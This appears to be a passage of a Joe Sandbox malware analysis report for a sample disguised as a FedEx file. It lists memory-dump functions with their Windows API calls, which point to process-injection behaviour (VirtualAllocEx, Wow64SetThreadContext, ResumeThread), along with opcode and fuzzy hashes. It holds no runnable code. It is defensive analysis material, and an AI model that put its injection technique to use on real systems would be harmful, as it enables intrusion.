Opcode ID: 77055634215979c6d1085dc6ada19a585320d40a0494376086ef5b5bc756450b
Instruction ID: 57c80db2404a7d99892b64e4a6c9dba6d389a6fedc3137fb7a5eba5a5c30e5d3
Opcode Fuzzy Hash: 77055634215979c6d1085dc6ada19a585320d40a0494376086ef5b5bc756450b
Instruction Fuzzy Hash: E52105B5D003499FDB10CF9AD884ADEBFF4EB49310F14802AE918A3350D374A941CFA4

Function 0619E060 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0619E0E0

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d837e57898a6d86c7dc1495f9cd7fd00f1c255ccbf80a3a3d100fb4629fcbea3
Instruction ID: 948c71a4d13ef4b95488a411fec624a54c05db6d543b1f75417a1017ca72f9e9
Opcode Fuzzy Hash: d837e57898a6d86c7dc1495f9cd7fd00f1c255ccbf80a3a3d100fb4629fcbea3
Instruction Fuzzy Hash: FC21F871D003599FDB10DFAAC841BDEBBF5FF48310F548429E959A7240CB799941CBA4

Function 0619D9A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0619DA1E

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 313795fa10ae54a43c5695197190da9e04c04f6c5eac94fb4e750ce2c4b2ec00
Instruction ID: 3465af963d33bfdeb240b25e66bfe202da1255fb191d8149f91531ad50741894
Opcode Fuzzy Hash: 313795fa10ae54a43c5695197190da9e04c04f6c5eac94fb4e750ce2c4b2ec00
Instruction Fuzzy Hash: 17214771D007098FDB10DFAAC485BEEBBF4EF49324F54842AD559A7240CB78A945CFA4

Function 0619DEA8 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0619DF1E

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2caddbd07ba824a96522ecd27139bce3b0afa5d05389aadede007838c98071c1
Instruction ID: a060bab53bd83a1565a62901fc61b794715113bc9b3707de176a733cd505377d
Opcode Fuzzy Hash: 2caddbd07ba824a96522ecd27139bce3b0afa5d05389aadede007838c98071c1
Instruction Fuzzy Hash: 33217775C007499FCF20DFAAD845BDEBBF5AF48324F24881AE964A3240CB35A501CFA0

Function 012CD600 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD687

Memory Dump Source

Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5b3164305dba683d4054829768f8e7fd483916188facd65c2c7f36bcec437612
Instruction ID: 305b471d5220580e6b9b5e308f60391aa56cde572ac4f33f79750f4cae48f1da
Opcode Fuzzy Hash: 5b3164305dba683d4054829768f8e7fd483916188facd65c2c7f36bcec437612
Instruction Fuzzy Hash: 0E21E3B5D002099FDB10CF9AD884ADEBBF4EB48310F14842AE918A3350C778A940CFA4

Function 012CA0E8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012CAFF9,00000800,00000000,00000000), ref: 012CB20A

Memory Dump Source

Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4f4dcb06d983476571c6f5dc02ba3e6e5a3875b1482d8a0200c01dbf436da0b3
Instruction ID: 5d9d7549e23385b091c5317a7849318f5a8ad1142e9bcb0ef1426b2e88b9fc5c
Opcode Fuzzy Hash: 4f4dcb06d983476571c6f5dc02ba3e6e5a3875b1482d8a0200c01dbf436da0b3
Instruction Fuzzy Hash: B71147B5C003098FDB20CF9AC845B9EFBF4EB89310F10842EE615A7200C7B5A505CFA5

Function 012CB198 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012CAFF9,00000800,00000000,00000000), ref: 012CB20A

Memory Dump Source

Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b61e901efa1d927d64891861bf7e7441bbe25de7409570099dac04c94affc2cd
Instruction ID: 0534f6736db664a3761db1ff7db8570dc71db93414bf5e807fec32eaff956950
Opcode Fuzzy Hash: b61e901efa1d927d64891861bf7e7441bbe25de7409570099dac04c94affc2cd
Instruction Fuzzy Hash: 0A2114B6D0024A8FDB20CFAAD445BDEFBF5EB88310F10852ED619A7200C779A545CFA5

Function 0619DEB0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0619DF1E

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4f3abdfc5b5993e35315491a9381e8f6f3efbf98b060f41588d196d175ab9cac
Instruction ID: bba3071b68b4d29a2da2b57e835a6a010447b4b1ee4b5f6187a3bfcc1485f041
Opcode Fuzzy Hash: 4f3abdfc5b5993e35315491a9381e8f6f3efbf98b060f41588d196d175ab9cac
Instruction Fuzzy Hash: 49111472C003499FDB20DFAAD845BDEBBF5AF48324F148419E515A7250CB75A941CBA4

Function 0619D8E8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0619D952

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 10aa54824266973cecc57b2809d0600a6b5c5e477840b15eb8555dd7f95a7566
Instruction ID: 5a8ce3bc1d4d81dac7bd0d2068d68edf6a8e9df01189ea7b0e7093f0730bffa8
Opcode Fuzzy Hash: 10aa54824266973cecc57b2809d0600a6b5c5e477840b15eb8555dd7f95a7566
Instruction Fuzzy Hash: 25114975D007498FDB20DFAAC44579EFFF4AF49320F14841ED459A7240CB755945CBA4

Function 01493D60 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 01493DC0

Memory Dump Source

Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 267509a7999a50e6906112957ef7a50e1b197f2854c31e5cd078fc25b3b8ce69
Instruction ID: 8e4c0b28d37677a395d53c2daacb3704e9d8196c40696d6b34a09c5a3e327b26
Opcode Fuzzy Hash: 267509a7999a50e6906112957ef7a50e1b197f2854c31e5cd078fc25b3b8ce69
Instruction Fuzzy Hash: 301116B58103498FDB20DFA9C445BDEBBF4FB49320F20851AD958A7340D739A545CFA5

Function 0619D8F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0619D952

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 04d0d8d4b813cb8d12ffc058f1fce5cb6d0c30415cf002c6f214331b67e7430f
Instruction ID: 04ba6dd7b89eb5dc6aeca7966d3b81c4fff718a48e1a86546db28c8bbd3eb52f
Opcode Fuzzy Hash: 04d0d8d4b813cb8d12ffc058f1fce5cb6d0c30415cf002c6f214331b67e7430f
Instruction Fuzzy Hash: E2113671D007498FDB20DFAAC8457AEFBF5EF88324F248429D519A7240CB79A945CFA4

Function 01491210 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 01491275

Memory Dump Source

Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7e5883500a0b9ccb951c76895bd1235cf170ad4adb3a9018463066d8ec45ffc6
Instruction ID: ab33b6b522a7211e70f7902141fb65749805c5d46c5f9d5f81557fde6c353bdb
Opcode Fuzzy Hash: 7e5883500a0b9ccb951c76895bd1235cf170ad4adb3a9018463066d8ec45ffc6
Instruction Fuzzy Hash: 571125B58003499FDB10DF9AC845BDEBFF8FB49320F14845AE558A3210C375AA44CFA1

Function 012CAF18 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 012CAF7E

Memory Dump Source

Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 34d52b94a84a99b5b5d2d54b8763dca6af5b89fb1c069fa7d40206ff5f2af538
Instruction ID: f9b2c52b0011a037395f5008b21e428815dffe0c98038b9e432d615a6c9cd7b4
Opcode Fuzzy Hash: 34d52b94a84a99b5b5d2d54b8763dca6af5b89fb1c069fa7d40206ff5f2af538
Instruction Fuzzy Hash: CB110FB5C0034A8FDB20CF9AC444B9EFBF4EB88724F10852AD528A7240D379A545CFA1

Function 01493D68 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 01493DC0

Memory Dump Source

Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d831ea65558a1196948ce6f0aa77affc2a51588cb4c483f6e0cb7b3e1396c575
Instruction ID: 77de51e21bca218b3c43cc407d3854007772f2ea368de3acde60b4f1f80427ad
Opcode Fuzzy Hash: d831ea65558a1196948ce6f0aa77affc2a51588cb4c483f6e0cb7b3e1396c575
Instruction Fuzzy Hash: 6A11F2B58003498FDB20DF9AC445BDEBBF4FB49320F10841AD968A7740D739A945CFA5

Function 01491218 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 01491275

Memory Dump Source

Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5d67a831ff75fdc6b5bde5dc4f520aaf9b6e699e022154f52afe0bcea7945246
Instruction ID: 403b7e1f4af9db9712b7ae2a2cf779961f85de8a2be637bbbc5da4aa25c2a196
Opcode Fuzzy Hash: 5d67a831ff75fdc6b5bde5dc4f520aaf9b6e699e022154f52afe0bcea7945246
Instruction Fuzzy Hash: EE11D0B58003499FDB20DF9AC885BDEBFF8FB49320F10845AE518A7250C379A944CFA5

Function 0118D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1217295620.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_118d000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78d84cdee5a37a47e47f31baf469b85771eff92d36c3895741ee1d75b6a2e029
Instruction ID: cf720357147c5beb68d6be7eb9df1c7426ef13c22148355285b317004fea20c4
Opcode Fuzzy Hash: 78d84cdee5a37a47e47f31baf469b85771eff92d36c3895741ee1d75b6a2e029
Instruction Fuzzy Hash: AC210671504304DFDF19EF58E9C0B56BB65FB84324F20C169D9090B696C336E456CFA2

Function 0118D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1217295620.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_118d000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3644f65f251a7658d01dabde857624d77d23a8c8b899b03189bbec800a75a720
Instruction ID: f4662c04d27cfdc3a1db9a916d0a4f3ac5e15dc6e01958e8dd1841a343b18dec
Opcode Fuzzy Hash: 3644f65f251a7658d01dabde857624d77d23a8c8b899b03189bbec800a75a720
Instruction Fuzzy Hash: 5121F471504340DFDF19EF54E9C0B26BF75FB84318F20C56AE8050A696C336D456CAB2

Function 0127D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1217386726.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_127d000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae585c5917cf691b9f645f69d1f80acbb2efa741e8defbfaec31b569aae0e740
Instruction ID: e160e6260526beefe0729783c1e1e372db69b08f1efcc43529cb101cebbeccd7
Opcode Fuzzy Hash: ae585c5917cf691b9f645f69d1f80acbb2efa741e8defbfaec31b569aae0e740
Instruction Fuzzy Hash: 59212271A14208EFDB05DF94D9C0B26BBA1FF84324F20C6ADE9494B283C376D807CA61

Function 0127D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1217386726.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_127d000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae32efcf4f9bfbd0ace9b5f4a609cde5b47e2f4dc2157d82d47d306631fb716
Instruction ID: dca3bf129fef64f023bb9c0f829c42bc3ee30a300a3ce0378dd8598b721bf765
Opcode Fuzzy Hash: 2ae32efcf4f9bfbd0ace9b5f4a609cde5b47e2f4dc2157d82d47d306631fb716
Instruction Fuzzy Hash: C6212275614308DFDB16DF64D9C4B17BB61EF84314F20C56DD90A0B286C376D807CA62

Function 0127D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1217386726.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_127d000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12110a3746e937ab448967c9bc35258d9d0f65b73d10241d5502d5440f5fc18f
Instruction ID: 5ce52824af8be8eca91ada0ce7414e93ca9bfe5ac6a3f9f43e225a808c092882
Opcode Fuzzy Hash: 12110a3746e937ab448967c9bc35258d9d0f65b73d10241d5502d5440f5fc18f
Instruction Fuzzy Hash: 86218E755093848FCB03CF24D990716BF71EF46314F28C5EAD9498B6A7C33A980ACB62

Function 0118D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1217295620.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_118d000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: 673458adb96adb10ddef04599d77e0c27bf3289130b3391200dbe257073bb9ad
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: 0111CD76504240DFCF06DF48D5C0B56BF62FB84324F24C2A9D8090A696C33AE45ACFA2

Function 0118D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1217295620.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_118d000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: 5a1e58da51ee6da7f6fada5d01aee6973b413b59dcde02b18a18b9175311873b
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: 13119D76504280DFCF16DF54E5C4B16BF72FB84324F24C6AAD8490B696C336D456CBA2

Function 0127D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1217386726.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_127d000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction ID: c95f26f9841428b6e9518c34b5167f2f9aae23781d493cb33f57193074a32884
Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction Fuzzy Hash: 8111A975504284DFDB06CF54C5C0B16BBA2FB84224F28C6A9D9494B297C33AD40ACB61

Function 0118D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1217295620.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_118d000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bdc910e28722ec4fb83aff72cddd27614adcfba87ae56fd5f34201191108f7e
Instruction ID: 7ff22a171eff6e0e39b56a74a457a4b053cfe02d696fdd12be6bab3e0f547929
Opcode Fuzzy Hash: 8bdc910e28722ec4fb83aff72cddd27614adcfba87ae56fd5f34201191108f7e
Instruction Fuzzy Hash: A901FC310047849AEB287A55EC84726BF98DF41229F14C419ED080A2C2C7789844CFB2

Function 0118D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1217295620.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_118d000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a61fa2c094669f83a223156ea955fc78bf27d840e2d526a28f93a0932ec407db
Instruction ID: f7c16f67c58e4643d8f9809186b3bb1ae3bc68fdc4400e07d062a93e4104508b
Opcode Fuzzy Hash: a61fa2c094669f83a223156ea955fc78bf27d840e2d526a28f93a0932ec407db
Instruction Fuzzy Hash: 4BF062714047849EEB249A1ADC84B62FFA8EF41735F18C55AEE084A2C6C379A844CBB1

Non-executed Functions

Function 01492230 Relevance: 2.8, Strings: 2, Instructions: 298COMMON

Download Yara Rule

Strings

PHq, xrefs: 0149241B
PHq, xrefs: 014924F3

Memory Dump Source

Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: d6c7eff160e33363393778baace05211d705e6bbb7b2f8ed963eebabb98e883c
Instruction ID: 8d26de88bdfb5935838fbabc4321955bd2994d19ec98553c44d2d75efa055bde
Opcode Fuzzy Hash: d6c7eff160e33363393778baace05211d705e6bbb7b2f8ed963eebabb98e883c
Instruction Fuzzy Hash: 17D1C134A006058FDB14DF69C598EADBBF1BF88311F2580A9E50AAB371DB71AD45CF60

Function 01493F98 Relevance: .4, Instructions: 360COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb26156c5390ae2ec58cc540f1f22ecb303ab633a694a46778762070bab0a75
Instruction ID: 169070e27f5c2a42680ea570b275eb1e07ab45072d269ca51430dea8ea9ecfac
Opcode Fuzzy Hash: 8bb26156c5390ae2ec58cc540f1f22ecb303ab633a694a46778762070bab0a75
Instruction Fuzzy Hash: BFD1AA307017058BEB29DB7AC510BAF7BE6AF99700F18456ED2469B3A0DF35E802CB51

Function 0619B553 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2ce636ab1f990095772e865f994b90003767952a2a4a3469be4c1b19139666d
Instruction ID: 00cf0c4d41efa8b47e5cbafa8f546da7aeb611031f569ba6f985c12879005085
Opcode Fuzzy Hash: c2ce636ab1f990095772e865f994b90003767952a2a4a3469be4c1b19139666d
Instruction Fuzzy Hash: 72E1E774E042198FDB14DFA9D580AAEBBF2FF89304F248169D815AB356D734AD41CFA0

Function 0619D0C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18b161168f319fb0c38660af5583b5af91ca86e70fd22ace83cd4e88c34a4a1c
Instruction ID: 7e4e880cdc4f0bbcd8fdb882a2065e81c4a2b3c71fe31b9dfe76f3fdd586b162
Opcode Fuzzy Hash: 18b161168f319fb0c38660af5583b5af91ca86e70fd22ace83cd4e88c34a4a1c
Instruction Fuzzy Hash: A7E1D874E006198FDB54CFA9D580AAEBBF2FF89304F248169D819A7356D734AD41CFA0

Function 0619CC90 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58e9344978c8917ee949161fb0bdfcd4029ab51acf725a32de5aee4382d4c32
Instruction ID: a74879fc302a7c1bd2c1032bc63e0a4a4e1b8e2045fc67946025de6b9b886292
Opcode Fuzzy Hash: e58e9344978c8917ee949161fb0bdfcd4029ab51acf725a32de5aee4382d4c32
Instruction Fuzzy Hash: 9BE1E774E002198FDB14DFA9C580AAEBBF2FF89304F248169D855A7356D735AD42CFA0

Function 0619DA78 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091c99fe6c4cd9cd3eeba944beca82b35a8c10a1219ab3a3aa62f26d63453d09
Instruction ID: 790dbc48947b6af147a07b02449a96626e03319703da15f40295ae0525d8eb9a
Opcode Fuzzy Hash: 091c99fe6c4cd9cd3eeba944beca82b35a8c10a1219ab3a3aa62f26d63453d09
Instruction Fuzzy Hash: 85E1E574E006198FDB14DFA9D580AAEFBB2FF89304F248169D815AB356D734AD41CFA0

Function 0619B990 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 393844e4df56e1aea3744a73a4cef9249d5cc1c9f79ca1319a0a9d0d27b4a1d7
Instruction ID: 397cc769cf66fe39b7ff6eed9f9e4c4f9e60830bdb841c004c3f2452745a766c
Opcode Fuzzy Hash: 393844e4df56e1aea3744a73a4cef9249d5cc1c9f79ca1319a0a9d0d27b4a1d7
Instruction Fuzzy Hash: BEE1E774E042198FDB54CFA9D580AAEBBF2FF89304F248169D815A7356D734AD41CFA0

Function 06193648 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 427ad2de2cac586879426939a56554578383c2a8fe7abc7d2d14f8de8792c6ed
Instruction ID: 582e6fa7ab063e27c849a609025ea86efbfc5c0552dcd4b3221955f44dbfa7cb
Opcode Fuzzy Hash: 427ad2de2cac586879426939a56554578383c2a8fe7abc7d2d14f8de8792c6ed
Instruction Fuzzy Hash: CCD1C635C2075A8BCB11EF64D990699F7B1FF95200F20C7AAE50A37214EB74AAD5CF81

Function 012CD2E4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17fe13a4c65711733c179772b480d940eeeecd99e38d33cbc5149d903f74357d
Instruction ID: a1822cfa08edfec826d6d066cdb3c583dbcd480963622751cb6bfcaaf68e3c75
Opcode Fuzzy Hash: 17fe13a4c65711733c179772b480d940eeeecd99e38d33cbc5149d903f74357d
Instruction Fuzzy Hash: 49A16136E1020A8FCF19DFB4C9445AEBBB3FF85700B15466EEA05AB265DB35D906CB40

Function 06193647 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac345f52f5679e9a8c7a9b1f58fd27716e0390819878c9d0482b4f10ba232762
Instruction ID: bb61d3a30b771c810e3daec2959e6809ac2bfd07f42c59fa5eff431886d10919
Opcode Fuzzy Hash: ac345f52f5679e9a8c7a9b1f58fd27716e0390819878c9d0482b4f10ba232762
Instruction Fuzzy Hash: 46D1C535C2075A8ACB11EF64D990699F7B1FF95200F20C7AAE50A37214EB74AAD5CF81

Function 01490006 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

